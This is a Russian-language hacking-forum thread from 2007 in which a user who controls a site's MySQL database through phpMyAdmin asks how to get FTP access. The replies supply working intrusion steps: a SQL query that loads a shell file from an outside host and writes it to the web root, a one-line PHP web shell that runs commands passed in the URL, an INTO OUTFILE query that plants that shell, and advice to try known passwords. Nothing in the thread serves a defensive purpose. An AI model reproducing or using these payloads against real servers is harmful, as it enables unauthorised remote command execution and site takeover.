Как получить доступ к ФТП, если владею mysql через phpmyadmin?

Discussion in 'Уязвимости' started by stolker, 26 Oct 2007.

  1. stolker

    stolker New Member

    Joined:
    30 Aug 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    :confused:
     
    #1 stolker, 26 Oct 2007
    Last edited: 27 Oct 2007
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    конечно нету, весьма маловероятно, что пароль сходится...

    все, что ты сейчас можешь сделать, как мне кажется, это залить шелл через sql-запрос вида
    select load_file('http://blablabla.ru/shell.txt') from mysql.user into outfile 'mda.php'
     
  3. stolker

    stolker New Member

    Joined:
    30 Aug 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Скиньте шел плиз в текстовом виде, и где шел будет находиться? :( например в mda.php?
     
    #3 stolker, 26 Oct 2007
    Last edited: 26 Oct 2007
  4. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    919
    Likes Received:
    213
    Reputations:
    154
    Для начала почитать фак на сайте хостера про фтп (Надо бы узнать куда коннектится и с каким юзернэйм). Потом попробовать известные тебе пароли. Потом попробовать залить шелл. Дальше, в зависимомти от прав, опыта и удачи.
    Например логином часто бывает директория пользоателя, например /home/www/sd34ret6/http
     
  5. stolker

    stolker New Member

    Joined:
    30 Aug 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Мне главное достать шел. скинте пожалуйста.
     
  6. _Master-

    _Master- Banned

    Joined:
    30 May 2007
    Messages:
    76
    Likes Received:
    64
    Reputations:
    13
    '<?php system($_GET[cmd]); ?>' в текстовый файл без кавычек )
    Запрос - shell.php?cmd=команда

    Можно просто
    SELECT '<?php system($cmd) ?>' FROM `таблица` INTO OUTFILE '/путь/до/шелла.php'
     
    #6 _Master-, 26 Oct 2007
    Last edited: 26 Oct 2007
Loading...